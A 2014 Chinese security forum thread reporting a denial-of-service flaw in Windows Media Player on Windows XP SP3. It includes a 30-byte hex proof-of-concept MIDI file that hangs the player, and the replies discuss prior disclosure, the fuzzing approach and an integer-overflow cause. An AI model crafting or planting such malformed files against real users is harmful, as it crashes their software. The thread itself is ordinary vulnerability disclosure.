首页
社区
课程
招聘
[原创]windows xp sp3 wmplayer.exe拒绝服务漏洞
发表于: 2014-4-8 21:35 4292

[原创]windows xp sp3 wmplayer.exe拒绝服务漏洞

2014-4-8 21:35
4292

wmplayer.exe在处理MID文件时候,存在拒绝服务漏洞。 构造特定的MID文件,可以让wmplayer.exe陷入死循环。
表现为程序无响应 wmplayer.exe版本是11.0.5721.5145  
漏洞内容: poc信息:把下列数据以16进制的形式保存在文件中(可以使用winhex) 保
存后命名为poc.mid 大小为30字节。 <code>4D546864000000060001000000014D54 726B000000004D54726B000000F8</code>
然后用系统的播放器wmplayer.exe 运行该程序即可。


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 5
支持
分享
最新回复 (19)
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
2
楼主把原理分析一下吧!!!
2014-4-8 21:47
0
雪    币: 142
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
大哥,你这么搞,微软知道么
2014-4-8 21:49
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
好像在哪里见过~
2014-4-8 22:10
0
雪    币: 612
活跃值: (3804)
能力值: ( LV12,RANK:200 )
在线值:
发帖
回帖
粉丝
5
不是吧,这可是我昨天挖出来的。
今天是4-8嘛
2014-4-8 22:11
0
雪    币: 10
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
微软已经停止更新鸟,呵呵
2014-4-8 22:24
0
雪    币: 8
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
XP被微软放弃了,咋折腾都有理....
2014-4-8 22:44
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
前几天在网上看到的:http://www.exploit-db.com/exploits/32477/
2014-4-8 22:45
0
雪    币: 612
活跃值: (3804)
能力值: ( LV12,RANK:200 )
在线值:
发帖
回帖
粉丝
9
还真是,纯属巧合。我的确没有发现这个。
2014-4-8 22:49
0
雪    币: 64
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
大神就是大神,这都知道了
2014-4-9 08:16
0
雪    币: 4939
活跃值: (2360)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
都是大牛啊
2014-4-9 10:52
0
雪    币: 11
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
12
搞上瘾了。。。
2014-4-9 11:52
0
雪    币: 196
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
求分析过程,在学习中
2014-4-10 23:32
0
雪    币: 35
活跃值: (139)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
14
求图,求真相.
2014-4-11 15:34
0
雪    币: 341
活跃值: (85)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
15
kanxue怎么老挂啊
2014-4-11 15:37
0
雪    币: 652
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
这个win7 pro 好像也可以。
2014-4-11 16:53
0
雪    币: 211
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
楼主你说是你发现的,表示怀疑,如果真是你发现的求发现分析过程。
2014-4-17 17:37
0
雪    币: 612
活跃值: (3804)
能力值: ( LV12,RANK:200 )
在线值:
发帖
回帖
粉丝
18
你凭什么怀疑我?

我挖掘思路是:
1 选取目标:播放器。 MID是最精简的音频文件格式(不知道有没有之一)
所以选择了它。
2 简单学习文件格式(因此文件结构比较简单,你可以继续研究文件格式,搞的复杂些,说不定就是一个缓冲区溢出)
3 用winhex构造文件

至于分析过程,
1 分析过程和挖掘过程相对独立。我不写分析过程就说明这不是我的原创了?
2 本论坛逆向分析大牛很多,我也不需要在此班门弄斧。
3 时间问题,没心力去分析了。
2014-4-18 21:09
0
雪    币: 0
活跃值: (954)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
19
这个样本我调试过,整数溢出类型的,不太好利用。只能玩玩
2014-5-19 17:43
0
雪    币: 6
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
http://www.wooyun.org/whitehats/光刃

:-D,厉害。
2014-5-20 17:01
0
游客
登录 | 注册 方可回帖
返回
//